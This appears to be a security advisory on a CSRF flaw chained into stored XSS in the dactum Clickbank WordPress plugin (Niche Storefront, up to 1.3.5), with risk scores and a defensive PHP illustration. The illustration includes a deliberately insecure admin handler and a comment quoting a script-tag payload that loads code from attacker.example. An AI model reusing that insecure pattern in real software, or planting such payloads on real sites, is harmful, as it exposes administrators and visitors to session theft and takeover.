Impact
The Clickbank WordPress Plugin (Niche Storefront) by dactum contains a Cross-Site Request Forgery (CSRF) flaw that can be chained into stored Cross-Site Scripting (XSS). The plugin does not verify that a state-changing request was deliberately submitted by the logged-in user (no nonce or equivalent origin check, which is the defining weakness of CWE-352), so an attacker can craft a request that writes attacker-controlled content into the plugin's stored data. If an authenticated user, typically an administrator, is tricked into submitting that request, for example by visiting a malicious page or following a link, the plugin stores the payload and the script then runs in the browser of every visitor who views the affected page. The resulting stored XSS can be used for credential or session theft and site defacement and, in some cases, escalated to remote code execution, for instance by abusing a hijacked administrator session to install or edit plugin code. Because the forged request must be sent by a logged-in victim, social engineering of an administrator is the expected delivery path.
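The pattern described above, as an added illustration that is not the plugin's own code: a hypothetical WordPress admin-post handler that stores a setting without a nonce, capability check, sanitisation or output escaping, followed by the hardened version. The hook name `nsf_save_title`, the option key `nsf_storefront_title` and the form field names are assumed for the example; only the WordPress API calls (`check_admin_referer`, `wp_nonce_field`, `current_user_can`, `sanitize_text_field`, `esc_html`) are real.

```php
<?php
/**
 * Hypothetical WordPress admin handler written for this page to illustrate
 * the CWE-352 (CSRF) -> stored XSS chain. It is NOT the dactum Clickbank
 * Niche Storefront plugin's code; the action names, the option key
 * 'nsf_storefront_title' and the field names are assumed.
 */

// --- Vulnerable form: no nonce, no capability check, no sanitisation -------

add_action( 'admin_post_nsf_save_title_vuln', 'nsf_save_title_vuln' );

function nsf_save_title_vuln() {
    // Any request that arrives with a logged-in user's session cookie is
    // accepted. A page on an attacker-controlled site can auto-submit a form to
    // wp-admin/admin-post.php?action=nsf_save_title_vuln; the victim's browser
    // attaches the cookie and the request is processed as if the admin sent it.
    $title = $_POST['storefront_title'];              // raw, attacker-controlled
    update_option( 'nsf_storefront_title', $title );  // stored as-is
    wp_safe_redirect( admin_url( 'admin.php?page=nsf' ) );
    exit;
}

function nsf_render_title_vuln() {
    // Echoed unescaped on a public page: a stored value such as
    // <script src="https://attacker.example/x.js"></script> runs for every visitor.
    echo '<h1>' . get_option( 'nsf_storefront_title' ) . '</h1>';
}

// --- Hardened form ---------------------------------------------------------

add_action( 'admin_post_nsf_save_title', 'nsf_save_title' );

function nsf_save_title() {
    // 1. CSRF defence: the request must carry a nonce bound to this action and
    //    to the current user's session. A cross-site form cannot read or guess
    //    it; check_admin_referer() stops with a 403 page if it is missing/invalid.
    check_admin_referer( 'nsf_save_title', 'nsf_nonce' );

    // 2. Authorisation: an authenticated low-privilege user (e.g. subscriber)
    //    must not be able to change storefront settings either.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }

    // 3. Sanitise before storing. sanitize_text_field() strips tags, so a
    //    script payload never reaches the database in executable form.
    $title = isset( $_POST['storefront_title'] )
        ? sanitize_text_field( wp_unslash( $_POST['storefront_title'] ) )
        : '';
    update_option( 'nsf_storefront_title', $title );

    wp_safe_redirect( admin_url( 'admin.php?page=nsf&updated=1' ) );
    exit;
}

function nsf_render_settings_form() {
    // The legitimate settings page embeds the nonce the handler expects.
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="nsf_save_title">
        <?php wp_nonce_field( 'nsf_save_title', 'nsf_nonce' ); ?>
        <input type="text" name="storefront_title"
               value="<?php echo esc_attr( get_option( 'nsf_storefront_title', '' ) ); ?>">
        <?php submit_button( 'Save' ); ?>
    </form>
    <?php
}

function nsf_render_title() {
    // 4. Escape on output as well: even if a value slipped past sanitisation,
    //    it cannot break out of the HTML text context.
    echo '<h1>' . esc_html( get_option( 'nsf_storefront_title', '' ) ) . '</h1>';
}
```

When auditing a plugin for this class of bug, look at every `admin_post_*`, `admin_action_*`, `wp_ajax_*` and settings handler and confirm all four controls are present: a nonce check, a capability check, input sanitisation and context-appropriate output escaping. A nonce alone does not stop a low-privilege authenticated user, and sanitisation alone does not stop a forged request from overwriting settings.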
Affected Systems
The affected product is the Clickbank WordPress Plugin (Niche Storefront) from vendor dactum. All versions from the earliest release through 1.3.5 are affected; no minimum affected version is listed, so any installation running 1.3.5 or earlier should be treated as vulnerable.
Risk and Exploitability
The CVSS score of 7.1 places this vulnerability in the High severity band (7.0 to 8.9), reflecting the potential for significant impact on site integrity and confidentiality. The EPSS score is below 1%, indicating that, as of the assessment date, the estimated probability of exploitation in the wild is low. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, so there is no public record of it being used in active campaigns. However, because the flaw uses CSRF to plant stored XSS, an attacker who convinces an administrator to submit a crafted request can compromise every user of the site. The victim must be authenticated, so social engineering techniques or malicious links targeting administrators are the most probable attack paths.